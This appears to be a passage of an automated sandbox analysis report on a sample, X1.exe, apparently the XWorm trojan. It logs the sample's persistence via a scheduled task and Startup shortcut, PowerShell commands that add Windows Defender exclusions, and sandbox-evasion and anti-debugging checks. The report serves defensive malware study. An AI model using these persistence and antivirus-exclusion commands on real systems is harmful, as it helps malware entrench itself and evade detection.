                            Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
                            Source: C:\Users\user\Desktop\X1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\X1.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\X1.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: X1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: X1.exe, X1.exe.0.dr Binary or memory string: SBIEDLL.DLLINFO
Source: C:\Users\user\Desktop\X1.exe Memory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\X1.exe Memory allocated: 1AE50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: 16D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: 1B250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: E80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: 1AD50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: 17B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\X1.exe Memory allocated: 1B210000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599658
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599532
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599407
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599282
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599157
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 599032
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598907
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598782
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598563
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598438
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598313
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598188
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 598063
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597954
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597829
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597704
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597579
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597454
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597329
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597204
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 597065
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596928
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596797
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596496
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596375
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596253
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 595022
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 594906
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 594797
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 594688
Source: C:\Users\user\Desktop\X1.exe Thread delayed: delay time: 594578
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\X1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\X1.exe Window / User API: threadDelayed 7822
Source: C:\Users\user\Desktop\X1.exe Window / User API: threadDelayed 1945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6616
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1498
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599658s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599407s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599282s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599157s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -599032s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598907s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598782s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598188s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -598063s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597954s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597829s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597704s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597579s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597454s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597329s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597204s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -597065s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596928s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596797s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596496s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596253s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -595022s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -594688s >= -30000s
Source: C:\Users\user\Desktop\X1.exe TID: 5476 Thread sleep time: -594578s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736 Thread sleep count: 8131 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736 Thread sleep count: 1498 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\X1.exe TID: 6436 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\X1.exe TID: 5308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\X1.exe TID: 4824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\X1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\X1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\X1.exe File Volume queried: C:\ FullSizeInformation
Source: X1.exe.0.dr Binary or memory string: vmware
Source: X1.exe, 00000000.00000002.3317632463.000000001BCC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\X1.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\X1.exe Code function: 0_2_00007FF848F178C1 CheckRemoteDebuggerPresent,0_2_00007FF848F178C1
Source: C:\Users\user\Desktop\X1.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\X1.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\X1.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\X1.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\X1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
Source: C:\Users\user\Desktop\X1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
Source: C:\Users\user\Desktop\X1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
Source: C:\Users\user\Desktop\X1.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2
Source: C:\Users\user\Desktop\X1.exe Queries volume information: C:\Users\user\Desktop\X1.exe VolumeInformation
Source: C:\Users\user\Desktop\X1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
